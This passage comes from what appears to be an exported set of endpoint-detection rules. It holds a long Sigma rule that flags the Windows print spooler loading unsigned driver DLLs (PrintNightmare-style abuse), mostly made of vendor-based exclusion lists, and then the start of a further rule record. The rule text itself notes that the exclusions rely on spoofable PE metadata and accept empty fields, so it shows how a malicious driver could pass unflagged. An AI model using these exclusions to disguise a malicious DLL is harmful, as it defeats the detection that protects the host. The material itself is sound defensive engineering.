# (KMPD50F9)\n - 'KX??????.dll' # (KXUU42AJ.dll)\n - 'Kc?????.DLL'\n - 'kmPipe.dll'\n - 'OEMResources.dll'\n - 'ky*.dll' # (kyfont4.dll, kyres14.dll, KyUPUI.dll, KyURes.dll, KyURTA.dll)\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GXE6MD.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\R1E6AD.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GXE6KAD.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GXEXNPCM.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GXEXNDRV.DLL\n exclusion_destiny:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\GXE*.DLL' # (GXEXNDRV.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\R?E6*.DLL' # (R8E6AU.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\GIE6??.DLL' # (GIE6AU.DLL)\n Description:\n - 'DESTINY Color Printer Driver Graphics'\n - 'DESTINY Color Printer Driver GUI'\n - 'Destiny Technology Corporation'\n - 'Spooler Setup DLL'\n - 'Destiny Corporation'\n - 'WinStyler Printer Driver'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\EF658756.dll\n exclusion_imaging:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\EF658756.DLL'\n Description: 'Fiery Driver(TM) UI Plugin'\n OriginalFileName: 'OEMPLUGE.DLL'\n InternalName: 'OEMPLUGE.DLL'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpltglr6.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpltcfg6.dll\n # Windows 2000 era HP drivers.\n exclusion_hp_designjet_nt:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hplt*' # (hpltuint.dll, hpltcfg6.DLL, hpltglr6.DLL, HPLTRPL10.DLL, hpltui5.dll, HPLTRPL9.EXE)\n Company: 'Hewlett-Packard Corporation, Microsoft Corporation'\n Product: 'HP DesignJet Series Printer Driver'\n\n exclusion_samsung_electronics:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NetFax??64.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\s*'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xp*.dll' # (xp3260n.dll, xp3260mu.dll)\n - 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ssp4mdu.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\us003du.dll'\n Company:\n - 'Samsung Electronics Co., Ltd.'\n - 'Samsung Electronics'\n - ''\n - 'Printer driver - Interface module'\n - 'Samsung Research Center, Moscow'\n OriginalFileName:\n - 'itdrvn.dll'\n - 'itdrvDU.DLL'\n - 'ssMUIDLL.dll'\n - 'ColorFB6.dll'\n - 'UsbIO.dll'\n - 'st4fxdrv.dll'\n - 'NETFAX??.DLL'\n - 'GetSNMP.dll'\n exclusion_samsung_universal:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\us005?.exe' # (us005a.exe)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\us005??.exe' # (us005dr.exe)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\us005?.dll' # (us005n.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\us005??.dll' # (us005an.dll, us005pi.dll, us005ua.dll, ...)\n Company: ''\n Description:\n - 'Samsung Universal Print Driver Utility'\n - 'Printer driver - Driver Configuration Utility'\n - 'SmartCMS4.0'\n - 'Printer driver - Interface module'\n - 'Printer driver - Resource module'\n - 'Printer driver - UI core module'\n - 'Popup Pipe Server'\n - 'ColorFB6 Dynamic Link Library'\n - 'AsyncUI Server Interface'\n - 'DllRunne Application'\n - 'CommonUs Dynamic Link Library'\n - 'Get Printer information using Network and USB port'\n exclusion_sharp:\n ImageLoaded:\n # (SU2EUPV7.DLL, SU2EGC.DLL , SU2EUR.DLL, SU2EUSR.DLL, SS0XU.DLL, ...)\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GF0EUC.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GN0EUC.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\SF0EUC.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\SD3BU.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GF0EU.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GH7EUC.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\SN0XU.DLL\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\S*.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\SHAR_RES.dll'\n - 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\???EU.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\???EUC.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cmprecnt.DLL'\n Company: 'SHARP CORPORATION'\n exclusion_pdflib:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\pdflib.dll'\n Company: 'PDFlib GmbH'\n OriginalFileName: 'pdflib.dll'\n exclusion_pdfwrt:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PDFWrtDrv.dll'\n OriginalFileName: 'PDFWrtDrv.DLL'\n InternalName: 'PDFWrtDrv'\n exclusion_nspdf:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NsPdfMdl.dll'\n OriginalFileName: 'NsPdfMdl.DLL'\n InternalName: 'NsPdfMdl'\n exclusion_newsoft:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Ism64.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NSUNI.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Fioall64.dll'\n Company:\n - 'NewSoft Technology Corporation'\n - 'Newsoft'\n - 'newsoftinc'\n OriginalFileName:\n - 'Ism.DLL'\n - 'NSUNI.DLL'\n - 'Fioall32.dll'\n exclusion_newsoft_missing_pe_info:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NSUI.dll'\n Company: ''\n OriginalFileName: ''\n InternalName: ''\n exclusion_nuance:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\znsprn*.fra' # (znsprnuires.fra)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\znsprn*.dll' # (znsprnui.dll, znsprngraf.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\znsprn*.ENU' # (znsprnuires.ENU)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NuanUI.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NuanOemUiRes.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UiSupportRes.ENU'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UiSupport.dll'\n Company:\n - 'Nuance Communications, Inc.'\n - 'Zeon Corp.'\n - 'Zeon Corporation.'\n exclusion_pxcuif:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PXC???.DLL' # 
PXC30f.DLL\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PXC?????.DLL' # PXC30UIa.DLL\n Company:\n - 'Tracker Software Products Ltd.'\n - 'Tracker Software'\n OriginalFileName:\n - 'PXC??.DLL'\n - 'PXC????.dll'\n exclusion_pxcuif_empty:\n # We must use size: '-1'\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PXC?????.DLL' # PXC40UIf.DLL\n Company: ''\n Product: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_lexmark1:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\??AC??4Z.DLL' # DKACHC4Z.DLL / LMACIL4Z.DLL\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LMA???4Z.DLL' # LMABJ74Z.DLL / LMAATC4Z.DLL\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LMUD064Z.DLL'\n Company:\n - 'Lexmark International, Inc.'\n - 'Microsoft Corp.'\n OriginalFileName: 'PSUIREP.dll'\n\n exclusion_lexmark2:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\lm??????.dll' # lmzarl32.dll, lmzadcmn.dll, lmzpmc3.dll, lmlznie1.dll, lmxgbzim.dll, ...\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\lm?????.dll' # lmzpmc3.dll\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\lm????.xrs' # lmxgbz.xrs\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\lm??????.xrs' # lmxgbzir.xrs\n Company:\n - 'Lexmark International, Inc.'\n - 'Lexmark International, Inc'\n - 'Lexmark International Inc.'\n - 'Lexmark'\n # Product: 'Lexmark Printer Driver' # sometimes empty...\n\n exclusion_lexmark_pcl:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LMAD????.DLL' # LMADUP40 / LMADUP4A / LMADUP4C / LMAD0PUH.DLL / LMAD0PUE.DLL / LMAD0PUD.DLL / LMAD2N4Z.DLL / ...\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LMUD1???.DLL' # LMUD1P40 / LMUD1PUE / LMUD1OUH.DLL / LMUD1O4Z.DLL / ...\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LMU03???.DLL' # LMU03PBJ.DLL / LMU03PTD.DLL / LMU03PUA.DLL\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\TSUD????.DLL' # TSUD1OBJ.DLL / TSUD1OUH.DLL / TSUD1OUB.DLL\n - 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LMUE????.DLL'\n #Company|contains: 'Lexmark' # sometimes no company name...\n\n exclusion_ms_pcl:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PCLXL.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PCL5ERES.DLL'\n Company: 'Microsoft Corporation'\n\n exclusion_fxsdrv:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXS??.DLL' # (FXSUI.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXS???.DLL' # (FXSDRV.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXS????.DLL' # (FXSWZRD.DLL, FXSTIFF.DLL)\n Company: 'Microsoft Corporation'\n OriginalFileName:\n - 'FXS??.DLL'\n - 'FXS???.DLL'\n - 'FXS????.DLL'\n exclusion_fxsdrv_without_infos:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXS??.DLL' # (FXSUI.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXS???.DLL' # (FXSDRV.DLL, FXSAPI.DLL, FXSRES.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXS????.DLL' # (FXSWZRD.DLL)\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_panasonic:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\D0GDGC2K.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\K0J*.DLL'\n Company:\n - 'Panasonic Communications Co., Ltd.'\n - 'Panasonic System Networks Co., Ltd.'\n\n exclusion_toshiba:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\eS*.dll' # eS4pCDTP.dll / eS4pPrc.dll / eSm166bd.dll / eSm166rd.dll / eSPx6XL.DLL / eSPx6UI.DLL / eSh6ufwdsdk.dll / eSf6uui.dll / eSf6uw/dll / eSf6ufwdsdk.dll / eSf6usf_builtin.dll / ...\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\eB2*.dll' # eB2oPrc.dll / eB2oCDTP.dll / eB2ox6ui.dll\n Company:\n - 'TOSHIBA TEC CORPORATION'\n - 'Monotype Imaging, Inc.'\n - 'Monotype Imaging Inc.'\n\n exclusion_toshiba_2:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\eSm6ssnm.dll'\n OriginalFileName: 'eSTsnmp.dll'\n InternalName: 
'eSTsnmp'\n\n exclusion_xps:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\XPSSVCS.DLL'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'xpssvcs.dll'\n\n exclusion_ttyui:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\TTY.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\TTYUI.DLL'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'tty.dll'\n\n exclusion_ttyres:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\TTYRES.DLL'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'Ttyres.dll'\n\n exclusion_rpcsui:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RPCSUI.DLL'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'RPCSUI.DLL'\n\n exclusion_marvell1:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HP??????.DLL' # (HP2030PP.DLL, HP2030GC.dll, HP2030SU.DLL, ... )\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\??hp1020.dll' # (suhp1020.dll, sdhp1020.dll, GChp1020.dll)\n Description:\n - 'Marvell Printer Software Driver'\n - 'HP Printer Software Driver'\n\n exclusion_marvell2:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HP????????.DLL' # (HPCP1020SD.DLL)\n Company: 'Marvell Semiconductor, Inc.'\n\n exclusion_electronics:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\EF??????.dll' # (EF691626.dll, EF997948.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\harmony*.dll' # (harmony_efi_color.dll, harmony_efi.dll, harmony_ctp.dll, harmony_core.dll, harmony10.dll, ...)\n Company: 'Electronics For Imaging, Inc.'\n\n exclusion_missing_pe_info:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\EF??????.dll' # (EF539658.dll)\n Company: ''\n Product: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_zeon:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UiSupport.dll'\n Company: 'Zeon Corporation.'\n\n exclusion_datacard:\n ImageLoaded: 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\dxp01UI.dll'\n Company: 'DataCard Corporation'\n\n exclusion_msvcr80_signed:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\msvc?80.dll' # (msvcr80.dll, msvcp80.dll)\n Company: 'Microsoft Corporation'\n OriginalFileName: 'MSVC?80.DLL'\n\n exclusion_vnc:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\VNCui.dll'\n Description: 'Driver UI DLL'\n Product: 'VNC Printer'\n\n exclusion_sendtoonenote_infos:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\SendToOneNoteUI.dll'\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_dell:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\DLPSLALU-1.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\dl*xpUI.DLL' # dltfm1zxpUI.DLL, dlthm1zxpui.dll\n Description:\n - 'Dell Printer Driver'\n - 'Dell FAX Printer Driver'\n Product:\n - 'Dell Printer Driver'\n - 'Dell * Multifunction Printer' # Dell C1765 Color Multifunction Printer\n\n exclusion_eptintblock:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\EPOBW9SC.DLL'\n Description: 'EPTintBlock_dll'\n OriginalFileName: 'EPTintBlock.dll'\n\n exclusion_mom:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\MomUdUi*.dll' # (MomUdUI.DLL, MomUdUiPS.dll, MomUdUIPclXl.dll)\n Description: 'MOM Universal Driver UI'\n OriginalFileName: 'MomUdUi.dll'\n\n exclusion_zenographics:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZTAG.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZGDI.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZSPOOL.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZSDDM.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZJBIG.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZSDDMUI.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\zSDNT5UI.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\suhp2600.dll'\n Company:\n - 'Zs, 
Inc.'\n - 'Zenographics, Inc.'\n Product:\n - 'Zenographics ZTag'\n - 'SuperPrint'\n - 'hp LaserJet 2600 series'\n\n exclusion_semiconductor:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZSUXML.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZSDm1120.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\GChp2600.dll'\n Company: 'Marvell Semiconductor, Inc.'\n Product:\n - 'SuperPrint'\n - 'Falcon'\n - 'Marvell Semiconductor SuperPrint'\n\n exclusion_xerces:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\XERCES-C.DLL'\n Company: 'Apache Software Foundation'\n Description: 'Shared Library for Xerces-C Version *' # (Shared Library for Xerces-C Version 1.7.0)\n OriginalFileName: 'xerces-c_*.dll' # (xerces-c_1_7_0.dll)\n\n exclusion_riso:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RC*.DLL' # RC30U.DLL / RC30C.DLL / RC30L.DLL / RC20C.DLL\n Company: 'RISO KAGAKU CORPORATION'\n Description: 'RISO KAGAKU CORPORATION : *'\n OriginalFileName: 'RC???.DLL' # RC30U.DLL / RC30C.DLL / RC30L.DLL\n\n exclusion_riso_without_infos:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Risopcfg2.dll'\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_uiplugin:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xp3250u.dll'\n Company: ''\n Description: 'UI Plug-In DLL'\n OriginalFileName: ''\n Product: 'UI Plug-In DLL'\n\n exclusion_openssl1:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xlibeay????.dll' # (xlibeay101j.dll)\n Company: 'The OpenSSL Project, http://www.openssl.org/'\n Description: 'OpenSSL Shared Library'\n OriginalFileName: 'libeay32.dll'\n InternalName: 'libeay32'\n\n exclusion_openssl2:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\x3encr8K.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\libcrypto-*-x64.dll' # (libcrypto-1_1-x64.dll)\n Company:\n - 'The OpenSSL Project, http://www.openssl.org/'\n 
- 'The OpenSSL Project, https://www.openssl.org/'\n Description: 'OpenSSL library'\n OriginalFileName: 'libcrypto'\n InternalName: 'libcrypto'\n\n exclusion_pdfui:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\pdfui64.dll' # (xlibeay101j.dll)\n InternalName: 'PDF Printer User Interface DLL'\n Product: 'PDF4U Adobe PDF Creator'\n\n exclusion_foxit:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fpmvpr_drv.dll'\n Company: 'Foxit Corporation'\n Description: 'Foxit PhantomPDF Printer: Virtual Printer Driver'\n\n exclusion_oce:\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ocewpdSUI.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ocewpdpui.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ocewpdMUI.DLL\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ocewpd?UI.DLL'\n Company: 'Océ-Technologies B.V.'\n Product:\n - 'Océ WPD'\n - 'Océ Publisher Printlet'\n\n exclusion_granite:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ONGui.dll'\n Company: 'Monotype Imaging Inc.'\n Product: 'Granite Printer Driver GUI for Windows'\n\n exclusion_polyergic:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\kuwpd*.dll' # (kuwpdui.dll, kuwpdgdi.dll, kuwpdglx.dll)\n Company:\n - 'Polyergic Consulting'\n - 'Polyergic Consulting for KIP America'\n Product:\n - 'IPS Unified Printer Driver'\n - 'KUWPD'\n\n exclusion_tskui:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\TSKUI.DLL'\n Company: 'Monotype Imaging Inc.'\n OriginalFileName: 'GSUI.DLL'\n\n exclusion_csjcxui:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\CSJCXUI.DLL'\n Company: ''\n OriginalFileName: 'CSJCXUI'\n\n exclusion_mimosaweb:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HF2XLFRFR.dll'\n Company: 'OEM'\n OriginalFileName: 'FRFR.DLL'\n\n exclusion_seagull:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\??#???-u.d64' # (tt#tec-u.d64, in#ipl-u.d64)\n - 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\??#???-?.dll' # (in#epl-e.d64)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Seagull_V3_*Dispatcher.dll' # (Seagull_V3_PrintDispatcher.dll, Seagull_V3_ConfigDispatcher.dll)\n Company: 'Seagull Scientific, Inc.'\n\n exclusion_webex:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\wdlres.dll'\n Company: 'Cisco WebEx LLC'\n OriginalFileName: 'wdlres.dll'\n\n exclusion_citizen:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cbm*.dll' # (cbm16.dll, cbmuni16.dll)\n Company: 'CITIZEN SYSTEMS JAPAN'\n\n exclusion_pdfbean:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\pdf4u64.dll'\n Company: 'PDF Bean Inc.'\n OriginalFileName: 'pdf4u64.dll'\n\n exclusion_dp:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\DPD??????.DLL' # (DPDS620RN.DLL, DPDS620RES.DLL)\n Description: 'DP-DS??? Printer Driver'\n\n exclusion_hp_distributed_by_ms:\n # https://www.virustotal.com/gui/file/71ce3bac24abc2b965158d186a93e0ac52cf89be23f7ae20b6b1c6c0162a18c6\n # https://www.virustotal.com/gui/file/48cfbfb5ac53c137baaea336e31f29e9d438f4c3eb12088fb156fb13a849e820\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HPBPRO.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HPBMINI.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HPZINW12.DLL'\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_unknowns:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\EAPuir0e.DLL' # 8527c74d8b62ec58a2db3cbf0ebf929caeee4454854a2036ca36271451666cf9\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\BRUIF13A.DLL' # 36002d2d7b9d42d0c3bcd929d607ca16a7d491c5b0f9e5892028cf5f4d588d3b\n\n exclusion_sha256:\n sha256:\n - 'b43d2bd4d16172048e6b493e051957441c558b5ad893c9fbe27f9834fea16afc'\n - '24c9544f5c00e0662e52ade8e997169aa51ee5f7a8e447701dec98d6ebe67563'\n - '7b67db0afa25c0bc31551e60de06ef0badc00e3b5ff64a96d8b3950e69a05b77'\n - 
'b7c013d662ce67aa0905c09ced8599f0a6e962f475bf3cf75eb55ea182ba76e0'\n\n exclusion_fujitsu:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FIP*.DLL' # (FIPVEN.DLL, FIPVCMND.DLL, FIPV.DLL, FIPVUI.DLL)\n Company: 'Fujitsu Isotec Limited'\n Description: 'FIT Thermal Printer Driver'\n\n exclusion_xprinter:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\POS80.DLL'\n Company: 'XINYE'\n Description: 'XP Thermal Printer Driver'\n\n exclusion_csprt:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\csprt.dll'\n OriginalFileName: 'CSPRT.DLL'\n Description: 'Cassette/Slide Printer UI'\n\n exclusion_zan:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\zvprt*5.dll' # (zvprtuni5.dll, zvprtui5.dll)\n OriginalFileName: 'zvprt*'\n Description: 'zvprt*'\n\n exclusion_microsoft_without_infos:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ASKOKI01.DLL'\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_known_companies:\n Company:\n - 'BIXOLON Co.,Ltd.'\n - 'CITIZEN SYSTEMS JAPAN'\n - 'SEIKO EPSON CORPORATION'\n - 'RISO KAGAKU CORPORATION.'\n - 'Windows (R) Codename Longhorn DDK provider'\n - 'BIXOLON Co., Ltd.'\n - 'DYMO Corp.'\n - 'Brady Corporation'\n - 'EPSON'\n - 'Flex Systems B.V.'\n - 'CANON INC.'\n - 'SHARP'\n - 'VIPColor'\n - '\"Seagull Scientific, LLC.\"'\n - 'GRAVOTECH'\n - 'Polyergic Consulting'\n - 'Trotec Laser GmbH'\n - 'Cembre S.p.A.'\n - 'Fujitsu Isotect Limited'\n - 'May Software'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5a0d71f-1a1b-430d-bdc6-2c661c63b6f9",
"rule_name": "Spoolsv Unsigned Print Provider Added",
"rule_description": "Detects spoolsv.exe (the Windows Print Spooler service) loading an unsigned print provider or printer driver DLL, potentially indicating exploitation of CVE-2021-1675 (PrintNightmare) or abuse of printer driver installation to run attacker-controlled code inside the spooler.\nSpoolsv is the print spooler service; an unsigned module loaded into it from the spool\\drivers directory can be used by attackers to execute code in that service's context and to persist as a printer driver.\nNote that the rule's exclusions are based on file paths and on PE version-information strings (Company, Product, Description, OriginalFileName, InternalName), which are unauthenticated and attacker-controllable, and several exclusions accept empty metadata or match on the Company string alone; treat them as noise reduction rather than as a trust boundary, and consider hunting for loads that match an exclusion but whose hash is not known.\nIt is recommended to collect and analyse the loaded DLL (hash, signature, PE metadata, creation time), stop the print spooler service, review the printer drivers and print providers installed on the host and remove any that cannot be attributed to a legitimate source, and check for any signs of unauthorized code execution or file modifications associated with this activity.\n",
"rule_creation_date": "2021-07-01",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5bcc588-5876-4367-bd97-d6c7914e8009",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096299Z",
"creation_date": "2026-03-23T11:45:34.096301Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096305Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
